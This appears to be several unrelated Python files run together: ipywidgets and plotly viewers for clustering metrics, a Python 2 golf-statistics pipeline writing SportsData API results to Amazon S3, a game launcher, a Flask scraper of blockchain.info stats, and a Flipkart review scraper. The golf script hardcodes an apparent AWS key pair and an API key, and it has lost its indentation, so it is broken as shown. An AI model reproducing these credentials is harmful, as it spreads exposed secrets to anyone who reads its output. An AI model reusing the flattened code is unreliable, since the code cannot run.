        keys_all = np.array(list(self.figures.keys()))
        self.fs_max_all = sorted(set(keys_all[:, 0]))
        self.norm_all = natsorted(set(keys_all[:, 1]))
        self.fft_bin_size_all = sorted(set(keys_all[:, 2]))
        self.psd_method_all = natsorted(set(keys_all[:, 3]))
        self.normf_all = natsorted(set(keys_all[:, 4]))
        # show 'none' first in the radio button groups
        self.norm_all = self.none_first(self.norm_all)
        self.normf_all = self.none_first(self.normf_all)
        self.panel_setup()
        self.panel_refresh()

    def none_first(self, my_sort):
        """Move the 'none' entry (if present) to the front of the list."""
        if 'none' in my_sort:
            my_sort.remove('none')
            my_sort = ['none'] + my_sort
        return my_sort

    def panel_setup(self):
        """Create the widgets, display them, and wire up the observers."""
        self.fs_max_select = widgets.RadioButtons(
            options=self.fs_max_all,
            value=self.fs_max_all[0],
            description='Fs max'
        )
        self.norm_select = widgets.RadioButtons(
            options=self.norm_all,
            value=self.norm_all[0],
            description='Norm time'
        )
        self.fft_bin_size_select = widgets.RadioButtons(
            options=self.fft_bin_size_all,
            value=self.fft_bin_size_all[0],
            description='FFT bin size'
        )
        self.psd_method_select = widgets.RadioButtons(
            options=self.psd_method_all,
            value=self.psd_method_all[0],
            description='PSD method'
        )
        self.normf_select = widgets.RadioButtons(
            options=self.normf_all,
            value=self.normf_all[0],
            description='Norm freq'
        )
        self.panel_height_select = widgets.IntSlider(
            min=100,
            max=2000,
            step=50,
            value=800,
            description='Panel height'
        )
        self.scale_select = widgets.IntSlider(
            min=10,
            max=100,
            step=10,
            value=100,
            description='Fig size'
        )
        self.params_hbox = widgets.HBox([
            self.fs_max_select,
            self.norm_select,
            self.fft_bin_size_select,
            self.psd_method_select,
            self.normf_select
        ])
        self.params_images_hbox = widgets.HBox([
            self.scale_select,self.panel_height_select
        ])
        self.images_vbox = widgets.VBox()
        display(widgets.VBox([
            self.params_hbox,
            self.params_images_hbox,
            self.images_vbox
        ]))
        # observers are attached after display so the initial values do
        # not trigger refreshes while the panel is being built
        self.fs_max_select.observe(self.panel_refresh, names='value')
        self.norm_select.observe(self.panel_refresh, names='value')
        self.fft_bin_size_select.observe(self.panel_refresh, names='value')
        self.psd_method_select.observe(self.panel_refresh, names='value')
        self.normf_select.observe(self.panel_refresh, names='value')
        self.panel_height_select.observe(self.panel_refresh, names='value')
        self.scale_select.observe(self.panel_refresh, names='value')

    def panel_refresh(self, *pargs):
        """Reload the image list to match the current widget selection."""
        # the selected parameter values joined with '_' must appear in
        # the figure's file path for the figure to be shown
        select_name = '_'.join([
            self.fs_max_select.value,
            self.norm_select.value,
            self.fft_bin_size_select.value,
            self.psd_method_select.value,
            self.normf_select.value
        ])
        figure_selection = natsorted([
            self.figures[item] for item in self.figures
            if select_name in self.figures[item]
        ])
        image_width = int(1350*self.scale_select.value/100)
        panel_height = self.panel_height_select.value
        images = []
        for figure_path in figure_selection:
            with open(figure_path, 'rb') as f:
                images += [widgets.Image(
                    value=f.read(),
                    layout={ 'width': str(image_width)+'px' }
                )]
        self.images_vbox.children=images
        self.images_vbox.layout={
            'height': str(panel_height)+'px',
        }
def selections_labels_get(my_stats_m):
    """Index underscore-joined stat keys by each analysis parameter.

    Returns (selections, labels) where selections[param] maps each
    observed value to the list of full keys carrying it, and
    labels[param] is the sorted value list with 'none' moved first.
    """
    selections_ref = [
        ('fs_max', 0, sorted),
        ('norm', 1, natsorted),
        ('fft_bin_size', 2, sorted),
        ('psd_method', 3, natsorted),
        ('normf', 4, natsorted),
    ]
    stats_tuples = np.array([name.split('_') for name in my_stats_m])
    selections = {}
    labels = {}
    for param, idx, sort_fn in selections_ref:
        values = set(stats_tuples[:, idx])
        selections[param] = {
            value: ['_'.join(parts)
                    for parts in stats_tuples[stats_tuples[:, idx] == value]]
            for value in values
        }
        ordering = sort_fn(values)
        if 'none' in ordering:
            ordering.remove('none')
            ordering = ['none'] + ordering
        labels[param] = ordering
    return selections, labels
class TableViewer:
    """Interactive qgrid table of validation clustering metrics,
    filterable by PSD method via a ToggleButtons widget."""

    def __init__(self, stats_m):
        self.stats_m = stats_m
        # Only the per-field key groupings are needed; labels are discarded.
        self.selections, _ = selections_labels_get(self.stats_m)
        self.psd_method_select = widgets.ToggleButtons(
            options=[
                ('All', ''),
                ('Welch', 'welch'),
                ('Multitaper', 'multitaper'),
            ],
            value='',
            description='PSD method',
        )
        self.grid = qgrid.show_grid(self.df_get(), precision=4)
        display(widgets.VBox([self.psd_method_select, self.grid]))
        self.psd_method_select.observe(self.grid_refresh, names='value')

    def df_get(self):
        """Build the metrics DataFrame for the current PSD-method filter."""
        chosen = self.psd_method_select.value
        if chosen:
            names = self.selections['psd_method'][chosen]
        else:
            names = list(self.stats_m)
        names = natsorted(names)
        # Column order matters for display: name index first, then metrics.
        columns = {'name': names}
        for metric in ('calinski_harabasz', 'davies_bouldin', 'silhouette'):
            columns[metric] = [self.stats_m[n]['val_' + metric] for n in names]
        df = pd.DataFrame(columns)
        df.set_index('name', inplace=True)
        return df

    def grid_refresh(self, change):
        """Observer callback: refresh the grid contents in place."""
        self.grid.df = self.df_get()
def rgb_to_rgba(color, alpha=1):
    """Convert a CSS ``'rgb(r, g, b)'`` string into ``'rgba(r, g, b, a)'``.

    ``color`` must start with ``'rgb('`` and end with ``')'``; no validation
    is performed.
    """
    channels = color[3:-1]  # keeps '(r, g, b' — drops 'rgb' prefix and ')'
    return 'rgba{0}, {1})'.format(channels, alpha)
class MetricsViewer:
    """Interactive plotly viewer of clustering-quality metrics.

    Shows one sorted scatter plot per metric and one scatter per metric
    pair, grouped/colored by a selectable parameter field and filterable
    by PSD method. Widgets refresh the figures in place via observers.
    """
    def __init__(self, stats_m, figures_folder=None):
        # stats_m: mapping of 'fsmax_norm_binsize_method_normf' key -> metric dict.
        # figures_folder is stored but not read anywhere in this class.
        self.stats_m = stats_m
        self.figures_folder = figures_folder
        self.selections, self.labels = selections_labels_get(self.stats_m)
        # NOTE(review): traces are colored by index into this fixed palette;
        # more groups than palette entries would raise IndexError — confirm
        # the label count stays within the default palette size.
        self.colors_ref = plotly.colors.DEFAULT_PLOTLY_COLORS
        # Human-readable titles for each metric key.
        self.my_metrics_ref = {
            'silhouette': 'Silhouette coefficient (higher better)',
            'val_silhouette': 'Silhouette coefficient (higher better) Validation',
            'calinski_harabasz': 'Calinski Harabasz index (higher better)',
            'val_calinski_harabasz': 'Calinski Harabasz index (higher better) Validation',
            'davies_bouldin': 'Davies Bouldin index (lower better)',
            'val_davies_bouldin': 'Davies Bouldin index (lower better) Validation'
        }
        # Metrics plotted individually (sorted scatter).
        self.my_metrics = [
            'silhouette',
            'val_silhouette',
            'calinski_harabasz',
            'val_calinski_harabasz',
            'davies_bouldin',
            'val_davies_bouldin'
        ]
        # Metric pairs plotted against each other (x-metric, y-metric).
        self.my_metrics_multi = [
            ['calinski_harabasz', 'davies_bouldin'],
            ['val_calinski_harabasz', 'val_davies_bouldin'],
            ['silhouette', 'davies_bouldin'],
            ['val_silhouette', 'val_davies_bouldin'],
            ['calinski_harabasz', 'silhouette'],
            ['val_calinski_harabasz', 'val_silhouette']
        ]
        # Which parameter field to group/color points by ('' = one group).
        self.params_select = widgets.ToggleButtons(
            options=[
                ('All', ''),
                ('PSD method', 'psd_method'),
                ('Fs max', 'fs_max'),
                ('Norm time', 'norm'),
                ('FFT bin size', 'fft_bin_size'),
                ('Norm freq', 'normf')
            ],
            value='',
            description='Selection',
        )
        # Restrict points to one PSD method ('' = no filter).
        self.filter_select = widgets.ToggleButtons(
            options=[
                ('All', ''),
                ('Welch', 'welch'),
                ('Multitaper', 'multitaper')
            ],
            value='',
            description='Filter',
        )
        self.data = self.data_select()
        self.data_multi = self.data_select(multi=True)
        self.fig_widgets = self.plot_setup()
        self.fig_widgets_multi = self.plot_setup(multi=True)
        # Layout kept for the commented-out Image widget below.
        self.image_layout = {'width': str(850)+'px' }
        self.fig_widgets_combo = []
        self.fig_widgets_multi_combo = []
        # Pair figures two per row, for both the single-metric and the
        # metric-pair figure lists.
        for fig_widgets, fig_widgets_combo in [
            [self.fig_widgets, self.fig_widgets_combo],
            [self.fig_widgets_multi, self.fig_widgets_multi_combo]
        ]:
            for row_idx in range(int(len(fig_widgets)/2)):
                fig_widgets_combo += [
                    widgets.HBox(
                        [
                            fig_widgets[2*row_idx],
                            fig_widgets[2*row_idx+1],
                            # widgets.Image(
                            #     disabled=True,
                            #     layout=self.image_layout
                            # )
                        ],
                        layout={'flex_flow':'row wrap'}
                    )
                ]
        display(widgets.VBox([self.params_select, self.filter_select]))
        display(widgets.VBox(self.fig_widgets_combo))
        display(widgets.VBox(self.fig_widgets_multi_combo))
        self.params_select.observe(self.plot_refresh, names='value')
        self.filter_select.observe(self.plot_refresh, names='value')
    def plot_setup(self, multi=False):
        """Build one FigureWidget per dataset entry.

        With multi=False a per-metric sorted scatter is built; with
        multi=True a metric-vs-metric scatter. One trace per group label.
        """
        if multi:
            data = self.data_multi
        else:
            data = self.data
        plot_widgets = []
        for idx_data, (my_name, my_data) in enumerate(data):
            trace = []
            for my_idx, (my_label, my_x, my_y, my_text) in enumerate(my_data):
                # Semi-transparent marker color, one palette entry per label.
                color = rgb_to_rgba(self.colors_ref[my_idx], 0.5)
                trace += [go.Scatter(
                    x=my_x,
                    y=my_y,
                    mode='markers',
                    text=my_text,
                    marker={
                        'color': color,
                        'size': 10
                    },
                    name=my_label
                )]
            if multi:
                # my_name is a (x-title, y-title) pair; strip the
                # '(higher/lower better)' suffix for the figure title.
                my_title = my_name[0].split(' (')[0] + ' vs ' + my_name[1].split(' (')[0]
                if 'Validation' in my_name[0]:
                    my_title += ' (Validation)'
                my_metric_x, my_metric_y = self.my_metrics_multi[idx_data]
                my_title_x = self.my_metrics_ref[my_metric_x].split(' Validation')[0]
                my_title_y = self.my_metrics_ref[my_metric_y].split(' Validation')[0]
            else:
                my_title = my_name.split(' (')[0]
                if 'Validation' in my_name:
                    my_title += ' (Validation)'
                my_title_x = 'Sorted params'
                my_title_y = my_name.split(' Validation')[0]
            layout = {
                'title': my_title,
                'hovermode': 'closest',
                'xaxis': {'title': my_title_x},
                'yaxis': {'title': my_title_y},
                'width': 500,
                'showlegend': True
            }
            plot_widgets += [go.FigureWidget(data=trace, layout=layout)]
        return plot_widgets
    def plot_refresh(self, change):
        """Observer callback: recompute datasets and rebuild all traces in place."""
        self.data = self.data_select()
        self.data_multi = self.data_select(multi=True)
        for fig_widgets, data in [
            [self.fig_widgets, self.data],
            [self.fig_widgets_multi, self.data_multi]
        ]:
            for my_data_idx, (_, my_data) in enumerate(data):
                # Drop existing traces, then re-add one per group label.
                fig_widgets[my_data_idx].data = []
                for my_idx, (my_label, my_x, my_y, my_text) in enumerate(my_data):
                    color = rgb_to_rgba(self.colors_ref[my_idx], 0.5)
                    fig_widgets[my_data_idx].add_trace(go.Scatter(
                        x=my_x,
                        y=my_y,
                        mode='markers',
                        text=my_text,
                        marker={
                            'color': color,
                            'size': 10
                        },
                        name=my_label
                    ))
    def data_filter(self):
        """Apply the current widget state to the stat keys.

        Returns:
            (my_stats_list, my_stats_keys, my_labels): all keys, a
            label -> keys grouping, and the ordered group labels.
        """
        my_stats_list = list(self.stats_m)
        if self.params_select.value=='':
            my_stats_keys = {'All': my_stats_list}
            my_labels = ['All']
        else:
            my_stats_keys = self.selections[self.params_select.value].copy()
            my_labels = self.labels[self.params_select.value]
        if self.filter_select.value!='':
            # Intersect every group with the keys of the chosen PSD method.
            for label in my_stats_keys:
                my_stats_keys[label] = [
                    key for key in my_stats_keys[label]
                    if key in self.selections['psd_method'][self.filter_select.value]
                ]
        return my_stats_list, my_stats_keys, my_labels
    def data_select(self, multi=False):
        """Assemble [name, [[label, x, y, text], ...]] entries for plotting.

        multi=False: per metric, params sorted by metric value (Davies-Bouldin
        order is flipped so that, per the metric titles, better values end up
        last for every metric). multi=True: per metric pair, raw x/y values.
        """
        my_stats_list, my_stats_keys, my_labels = self.data_filter()
        data = []
        if multi:
            for my_metric_x, my_metric_y in self.my_metrics_multi:
                my_name_x = self.my_metrics_ref[my_metric_x]
                my_name_y = self.my_metrics_ref[my_metric_y]
                my_name = (my_name_x, my_name_y)
                my_data = []
                for my_label in my_labels:
                    my_stats_label = [
                        key for key in my_stats_list
                        if key in my_stats_keys[my_label]
                    ]
                    my_x = [
                        self.stats_m[key][my_metric_x] for key in my_stats_label
                    ]
                    my_y = [
                        self.stats_m[key][my_metric_y] for key in my_stats_label
                    ]
                    my_text = [key for key in my_stats_label]
                    my_data += [[my_label, my_x, my_y, my_text]]
                data += [[my_name, my_data]]
        else:
            for my_metric in self.my_metrics:
                my_name = self.my_metrics_ref[my_metric]
                idx_sort = np.argsort([
                    self.stats_m[key][my_metric] for key in my_stats_list
                ])
                if my_metric in ['davies_bouldin', 'val_davies_bouldin']:
                    idx_sort = idx_sort[::-1]
                my_stats_sorted = [my_stats_list[idx] for idx in idx_sort]
                my_data = []
                for my_label in my_labels:
                    # x is the rank within the global sort, so groups share
                    # a common x axis across traces.
                    my_x = [
                        idx_key for idx_key, key in enumerate(my_stats_sorted)
                        if key in my_stats_keys[my_label]
                    ]
                    my_y = [
                        self.stats_m[key][my_metric] for key in my_stats_sorted
                        if key in my_stats_keys[my_label]
                    ]
                    my_text = [
                        key for key in my_stats_sorted
                        if key in my_stats_keys[my_label]
                    ]
                    my_data += [[my_label, my_x, my_y, my_text]]
                data += [[my_name, my_data]]
        return data
class CacheLoader:
    """Dropdown-driven loader of cached stats from subfolders of base_path."""

    def __init__(self, base_path):
        self.base_path = base_path
        self.stats_m = {}
        self.sources = {}
        # Index every subdirectory that actually contains cache files.
        for entry in os.listdir(self.base_path):
            entry_path = os.path.join(self.base_path, entry)
            if not os.path.isdir(entry_path):
                continue
            cache_files = mod_common_utils.list_cache(entry_path)
            if cache_files:
                self.sources[entry_path] = cache_files
        self.source_select = widgets.Dropdown(
            options=[''] + natsorted(self.sources),
            value='',
            description='Source'
        )
        self.source_out = widgets.Output()
        display(widgets.HBox([
            self.source_select,
            self.source_out
        ]))
        self.source_select.observe(self.load_source, names='value')
        self.widgets = ([self.source_select])

    def load_source(self, change):
        """Observer callback: (re)load all cached stats for the chosen source."""
        path = self.source_select.value
        if path == '':
            return
        self.stats_m = {}
        self.source_out.clear_output()
        with self.source_out:
            print('Loading...')
        # Merge every cache file of this source into one stats dict.
        for cached_name in self.sources[path]:
            chunk = mod_common_utils.from_cache(cached_name, path)
            for key in chunk:
                self.stats_m[key] = chunk[key]
        self.stats_m = mod_common_utils.stats_eval(self.stats_m)
        self.source_out.clear_output()
        with self.source_out:
            print('Loaded data from', path)
import requests
import json
import time
import math
from boto.s3.connection import S3Connection
from boto.s3.key import Key
# Tournament to process and season year (edit these two to rerun for others).
tournament_name = 'The Masters'
year = 2015
# get tournament schedule from AWS
# SECURITY NOTE(review): AWS credentials are hardcoded here and committed to
# source. Rotate these keys immediately and load them from the environment or
# an IAM role instead.
c = S3Connection('AKIAIQQ36BOSTXH3YEBA','cXNBbLttQnB9NB3wiEzOWLF13Xw8jKujvoFxmv3L')
b = c.get_bucket('public.tenthtee')
# Three reusable S3 key handles on the same bucket (k mainly for writes,
# k1/k2 for the read-then-write passes further down).
k = Key(b)
k1 = Key(b)
k2 = Key(b)
# Snapshot of every key name in the bucket; later sections test membership in
# this list before reading, to skip rounds that were never stored.
rs = b.list()
keys = []
for key in rs:
    keys.append(key.name)
# Fetch the season schedule previously stored in S3.
k.key = 'sportsData/' + str(year) + '/schedule.json'
schedule_string = k.get_contents_as_string()
schedule = json.loads(schedule_string)
# get tournament id
for tournament in schedule['tournaments']:
if tournament['name'] == tournament_name:
# uncomment line below to identify the tournament names
# print tournament['name'],tournament['id']
# if tournament['name'] == target_tournament: break
# identify tournament to get api
#if tournament['name'] == tournament_name:
tournament_id = tournament['id']
print tournament_id
# HOLE STATS
sports_data_key = 'd6aw46aafm49s5xyc2bj8vwr'
request_string = 'http://api.sportsdatallc.org/golf-t1/hole_stats/pga/' + str(year) + '/tournaments/' + tournament_id + '/hole-statistics.json?api_key=' + sports_data_key
r = requests.get(request_string)
hole_stats = r.json()
hole_stats = json.dumps(hole_stats)
# save hole_stats to AWS S3
k.key = 'sportsData/' + str(year) + '/' + tournament_name + '/hole_stats.json'
k.set_contents_from_string(hole_stats)
print 'hole stats'
# SCORECARDS
for rd in [1,2,3,4]:
# use tournament id to get round scores
time.sleep(1)
request_string = 'http://api.sportsdatallc.org/golf-t1/scorecards/pga/' + str(year) + '/tournaments/' + tournament_id + '/rounds/'+ str(rd) + '/scores.json?api_key=' + sports_data_key
r = requests.get(request_string)
scorecards = r.json()
scorecards = json.dumps(scorecards)
# save hole_stats to AWS S3
k.key = 'sportsData/' + str(year) + '/' + tournament_name + '/rounds/' + str(rd) + '/scorecards.json'
k.set_contents_from_string(scorecards)
time.sleep(3)
print 'scorecards - rd ' + str(rd)
# TEETIMES
request_string = 'http://api.sportsdatallc.org/golf-t1/teetimes/pga/' + str(year) + '/tournaments/' + tournament_id + '/rounds/'+ str(rd) + '/teetimes.json?api_key=' + sports_data_key
r = requests.get(request_string)
teetimes = r.json()
teetimes = json.dumps(teetimes)
# save tee times to AWS S3
k.key = 'sportsData/' + str(year) + '/' + tournament_name + '/rounds/' + str(rd) + '/teetimes.json'
k.set_contents_from_string(teetimes)
time.sleep(3)
print 'tee times - rd ' + str(rd)
# HOLE AVERAGES
# use tournament id to get AWS scorecards
k1.key = 'sportsData/' + str(year) + '/' + tournament_name + '/rounds/' + str(rd) + '/scorecards.json'
scorecards_string = k1.get_contents_as_string()
scorecards = json.loads(scorecards_string)
if 'round' not in scorecards: continue
if 'players' not in scorecards['round']: continue
hole_averages = {}
hole_averages['tournament'] = tournament_name
hole_averages['id'] = tournament_id
hole_averages['round'] = rd
hole_averages['courses'] = []
# create courses set
for player in scorecards['round']['players']:
course = player['course']['name']
if course not in hole_averages['courses']:
hole_averages['courses'].append(player['course']['name'])
for course in hole_averages['courses']:
hole_averages[course] = {}
hole_averages[course]['holes'] = {}
for hole_num in xrange(1,18+1):
hole_averages[course]['holes'][hole_num] = {}
hole_averages[course]['holes'][hole_num]['total_strokes'] = 0
hole_averages[course]['holes'][hole_num]['num_players'] = 0
for player in scorecards['round']['players']:
if player['course']['name'] == course:
for hole in player['scores']:
hole_number = hole['number']
hole_averages[course]['holes'][hole_number]['total_strokes'] += int(hole['strokes'])
hole_averages[course]['holes'][hole_number]['num_players'] += 1
for hole_num in xrange(1,18+1):
hole_averages[course]['holes'][hole_num]['average'] = float(hole_averages[course]['holes'][hole_num]['total_strokes']) / float(hole_averages[course]['holes'][hole_num]['num_players'])
# save to AWS S3
hole_averages = json.dumps(hole_averages)
k2.key = 'sportsData/' + str(year) + '/' + tournament_name + '/rounds/' + str(rd) + '/hole_averages.json'
k2.set_contents_from_string(hole_averages)
print 'hole averages - rd ' + str(rd)
time.sleep(1)
# STROKES GAINED
k1.key = 'sportsData/' + str(year) + '/' + tournament_name + '/rounds/' + str(rd) + '/scorecards.json'
if k1.key not in keys: continue
scorecards_string = k1.get_contents_as_string()
scorecards = json.loads(scorecards_string)
# use tournament id to get AWS hole averages
k2.key = 'sportsData/' + str(year) + '/' + tournament_name + '/rounds/' + str(rd) + '/hole_averages.json'
if k2.key not in keys: continue
hole_averages_string = k2.get_contents_as_string()
hole_averages = json.loads(hole_averages_string)
if 'round' not in scorecards: continue
if 'players' not in scorecards['round']: continue
strokes_gained = {}
strokes_gained['tournament'] = tournament_name
strokes_gained['id'] = tournament_id
strokes_gained['round'] = rd
# create courses set
for player in scorecards['round']['players']:
player_name = player['first_name'] + ' ' + player['last_name']
strokes_gained[player_name] = {}
course = player['course']['name']
strokes_gained[player_name]['course'] = course
strokes_gained[player_name]['rd_strokes_gained'] = 0
strokes_gained[player_name]['num_holes'] = 0
for score in player['scores']:
hole_num = score['number']
strokes_gained[player_name][hole_num] = {}
strokes_gained[player_name][hole_num]['strokes'] = float(score['strokes'])
if strokes_gained[player_name][hole_num]['strokes'] == 0: continue
strokes_gained[player_name][hole_num]['average'] = float(hole_averages[course]['holes'][str(hole_num)]['average'])
strokes_gained[player_name][hole_num]['strokes_gained'] = float(hole_averages[course]['holes'][str(hole_num)]['average']) - float(score['strokes'])
strokes_gained[player_name]['rd_strokes_gained'] += float(strokes_gained[player_name][hole_num]['strokes_gained'])
if player_name == 'Will MacKenzie':
print player_name, hole_num, score['strokes'],hole_averages[course]['holes'][str(hole_num)]['average'], strokes_gained[player_name][hole_num]['strokes_gained'], strokes_gained[player_name]['rd_strokes_gained']
strokes_gained[player_name]['num_holes'] += 1
if player_name == 'Rory McIlroy':
print "rd_strokes_gained: ", rd, strokes_gained[player_name]['rd_strokes_gained']
# save to AWS S3
strokes_gained = json.dumps(strokes_gained)
k2.key = 'sportsData/' + str(year) + '/' + tournament_name + '/rounds/' + str(rd) + '/strokes_gained.json'
k2.set_contents_from_string(strokes_gained)
print 'strokes gained - rd ' + str(rd)
time.sleep(1)
# VARIANCES
k1.key = 'sportsData/' + str(year) + '/' + tournament_name + '/rounds/' + str(rd) + '/scorecards.json'
if k1.key not in keys: continue
scorecards_string = k1.get_contents_as_string()
scorecards = json.loads(scorecards_string)
# use tournament id to get AWS scorecards
k2.key = 'sportsData/' + str(year) + '/' + tournament_name + '/rounds/' + str(rd) + '/hole_averages.json'
if k2.key not in keys: continue
hole_averages_string = k2.get_contents_as_string()
hole_averages = json.loads(hole_averages_string)
if 'round' not in scorecards: continue
if 'players' not in scorecards['round']: continue
variances = {}
variances['tournament'] = tournament_name
variances['id'] = tournament_id
variances['round'] = rd
# create courses set
for player in scorecards['round']['players']:
player_name = player['first_name'] + ' ' + player['last_name']
variances[player_name] = {}
course = player['course']['name']
variances[player_name]['course'] = course
variances[player_name]['rd_variance'] = 0
variances[player_name]['num_holes'] = 0
for score in player['scores']:
hole_num = score['number']
variances[player_name][hole_num] = {}
variances[player_name][hole_num]['strokes'] = score['strokes']
if variances[player_name][hole_num]['strokes'] == 0: continue
variances[player_name][hole_num]['average'] = hole_averages[course]['holes'][str(hole_num)]['average']
variances[player_name][hole_num]['variance'] = math.pow((float(hole_averages[course]['holes'][str(hole_num)]['average']) - float(score['strokes'])),2)
variances[player_name]['rd_variance'] += float(variances[player_name][hole_num]['variance'])
variances[player_name]['num_holes'] += 1
# save to AWS S3
strokes_gained = json.dumps(variances)
k2.key = 'sportsData/' + str(year) + '/' + tournament_name + '/rounds/' + str(rd) + '/variances.json'
k2.set_contents_from_string(strokes_gained)
print 'variances - rd ' + str(rd)
time.sleep(1)
print year, tournament_name, rd
time.sleep(1)
# SCORE DISTRIBUTION
scores = {}
scores['tournament'] = tournament_name
scores['id'] = tournament_id
scores['courses'] = []
k1.key = 'sportsData/' + str(year) + '/' + tournament_name + '/rounds/' + str(1) + '/scorecards.json'
scorecards_string = k1.get_contents_as_string()
scorecards = json.loads(scorecards_string)
if 'round' not in scorecards: continue
if 'players' not in scorecards['round']: continue
# create courses set
for player in scorecards['round']['players']:
course = player['course']['name']
if course not in scores['courses']:
scores['courses'].append(player['course']['name'])
for course in scores['courses']:
scores[course] = {}
scores[course]['holes'] = {}
for hole_num in xrange(1,18+1):
scores[course]['holes'][hole_num] = {}
scores[course]['holes'][hole_num]['scores'] = []
scores[course]['holes'][hole_num]['occurences'] = {}
scores[course]['holes'][hole_num]['percentages'] = {}
for rd in [1,2,3,4]:
# use tournament id to get AWS scorecards
k1.key = 'sportsData/' + str(year) + '/' + tournament_name + '/rounds/' + str(rd) + '/scorecards.json'
scorecards_string = k1.get_contents_as_string()
scorecards = json.loads(scorecards_string)
if 'round' not in scorecards: continue
if 'players' not in scorecards['round']: continue
for player in scorecards['round']['players']:
if player['course']['name'] == course:
for hole in player['scores']:
hole_number = hole['number']
scores[course]['holes'][hole_number]['scores'].append(int(hole['strokes']))
for hole_num in xrange(1,18+1):
for stroke_num in xrange(1,9):
scores[course]['holes'][hole_num]['occurences'][stroke_num] = scores[course]['holes'][hole_num]['scores'].count(stroke_num)
scores[course]['holes'][hole_num]['percentages'][stroke_num] = float(scores[course]['holes'][hole_num]['occurences'][stroke_num]) / float(len(scores[course]['holes'][hole_number]['scores']))
# save to AWS S3
scores = json.dumps(scores)
k2.key = 'sportsData/' + str(year) + '/' + tournament_name + '/scores.json'
k2.set_contents_from_string(scores)
print 'score distributions'
# STROKES GAINED BY TOURNAMENT
k1.key = 'sportsData/' + str(year) + '/' + tournament_name + '/rounds/1/scorecards.json'
if k1.key not in keys: continue
scorecards_string = k1.get_contents_as_string()
scorecards = json.loads(scorecards_string)
strokes_gained = {}
strokes_gained['tournament'] = tournament_name
strokes_gained['id'] = tournament_id
if 'players' not in scorecards['round']: continue
# create courses set
for player in scorecards['round']['players']:
player_name = player['first_name'] + ' ' + player['last_name']
strokes_gained[player_name] = {}
strokes_gained[player_name]['tournament_strokes_gained'] = 0
strokes_gained[player_name]['tournament_num_holes'] = 0
for rd in [1,2,3,4]:
# use tournament id to get AWS scorecards
k1.key = 'sportsData/' + str(year) + '/' + tournament_name + '/rounds/' + str(rd) + '/strokes_gained.json'
if k1.key not in keys: continue
rd_strokes_gained = k1.get_contents_as_string()
rd_strokes_gained = json.loads(rd_strokes_gained)
if player_name not in rd_strokes_gained: continue
strokes_gained[player_name]['tournament_strokes_gained'] += float(rd_strokes_gained[player_name]['rd_strokes_gained'])
strokes_gained[player_name]['tournament_num_holes'] += float(rd_strokes_gained[player_name]['num_holes'])
# save to AWS S3
strokes_gained = json.dumps(strokes_gained)
k2.key = 'sportsData/' + str(year) + '/' + tournament_name + '/strokes_gained.json'
k2.set_contents_from_string(strokes_gained)
print 'strokes gained by tournament'
# VARIANCES BY TOURNAMENT
k1.key = 'sportsData/' + str(year) + '/' + tournament_name + '/rounds/1/scorecards.json'
if k1.key not in keys: continue
scorecards_string = k1.get_contents_as_string()
scorecards = json.loads(scorecards_string)
variances = {}
variances['tournament'] = tournament_name
variances['id'] = tournament_id
if 'players' not in scorecards['round']: continue
# create courses set
for player in scorecards['round']['players']:
player_name = player['first_name'] + ' ' + player['last_name']
variances[player_name] = {}
variances[player_name]['tournament_variance'] = 0
variances[player_name]['tournament_num_holes'] = 0
for rd in [1,2,3,4]:
# use tournament id to get AWS scorecards
k1.key = 'sportsData/' + str(year) + '/' + tournament_name + '/rounds/' + str(rd) + '/variances.json'
if k1.key not in keys: continue
rd_strokes_gained = k1.get_contents_as_string()
rd_strokes_gained = json.loads(rd_strokes_gained)
if player_name not in rd_strokes_gained: continue
variances[player_name]['tournament_variance'] += float(rd_strokes_gained[player_name]['rd_variance'])
variances[player_name]['tournament_num_holes'] += float(rd_strokes_gained[player_name]['num_holes'])
#print player_name,variances[player_name]['tournament_variances'], variances[player_name]['tournament_num_holes']
# save to AWS S3
strokes_gained = json.dumps(variances)
k2.key = 'sportsData/' + str(year) + '/' + tournament_name + '/variances.json'
k2.set_contents_from_string(strokes_gained)
print 'variance by tournament' |
from wargame.attackoftheorcs import AttackOfTheOrcs

# Script entry point.
if __name__ == '__main__':
    # Create the game instance and start playing.
    game = AttackOfTheOrcs()
    game.play()
import urllib
import json
from bs4 import BeautifulSoup
from flask import Flask
# Map of row labels on the blockchain.info/stats page -> output JSON field names.
# NOTE(review): "Trade Volume" appears twice below; a Python dict keeps only the
# last entry, so "trade_volume_usd" is dead and can never be emitted. The two
# rows need distinct labels — confirm against the live page markup.
# NOTE(review): the '%%' in the last two labels is a literal two-character
# sequence (no %-formatting happens on dict keys); if the page shows a single
# '%', these labels will never match — verify.
statDims = {
    "Blocks Mined": "blocks_mined",
    "Time Between Blocks": "time_between_blocks",
    "Bitcoins Mined": "bitcoins_mined",
    "Total Transaction Fees": "total_transaction_fees",
    "No. of Transactions": "num_transactions",
    "Total Output Volume":"total_output_volume",
    "Estimated Transaction Volume": "estimated_transaction_volume",
    "Estimated Transaction Volume (USD)": "estimated_transaction_volume_usd",
    "Market Price": "market_price",
    "Trade Volume": "trade_volume_usd",
    "Trade Volume": "trade_volume_btc",
    "Total Miners Revenue": "total_miners_revenue",
    '%% earned from transaction fees': "percent_transaction_fees",
    '%% of transaction volume': "percent_transaction_volume",
    'Cost per Transaction': "cost_per_transaction",
    'Difficulty': "difficulty",
    'Hash Rate': "hash_rate"
}
# NOTE(review): module-level accumulator mutated by stats(); shared across
# requests, so values from earlier requests persist. Not thread-safe.
json_data = {}
app = Flask(__name__)
@app.route("/stats")
def stats():
contenturl = "https://blockchain.info/stats"
content = urllib.urlopen(contenturl).read()
soup = BeautifulSoup(content, "html.parser")
table_data = soup.find_all('td')
curDim = ""
for row in table_data:
if row.string is not None and row.string in statDims.keys():
curDim = row.string
elif curDim != "" and row.string is not None:
json_data[statDims[curDim]] = row.string
elif not row.string is None:
row.string
return json.dumps(json_data, indent=4)
if __name__ == "__main__":
app.run()
|
# Web scraping of Flipkart product reviews using the html.parser backend.
from bs4 import BeautifulSoup as bs
import requests
import pandas as pd

# Product-review page to scrape (Portronics Harmonics 216 headset).
link='https://www.flipkart.com/portronics-harmonics-216-bluetooth-headset/product-reviews/itm56304ccc8e996?pid=ACCFHHWUEXCFBMST&lid=LSTACCFHHWUEXCFBMSTGHSLHL&marketplace=FLIPKART'
page = requests.get(link)
soup = bs(page.content, 'html.parser')

# NOTE(review): the CSS class names below are Flipkart's obfuscated,
# auto-generated classes and break whenever the site is redeployed —
# verify against the live page before relying on this script.

# Review headlines.
review_title = [tag.get_text() for tag in soup.find_all('p', class_='_2-N8zT')]
# Star ratings.
rate = [tag.get_text() for tag in soup.find_all('div', class_='_3LWZlK _1BLPMq')]
# Full review bodies.
review_content = [tag.get_text() for tag in soup.find_all('div', class_='t-ZTKy')]

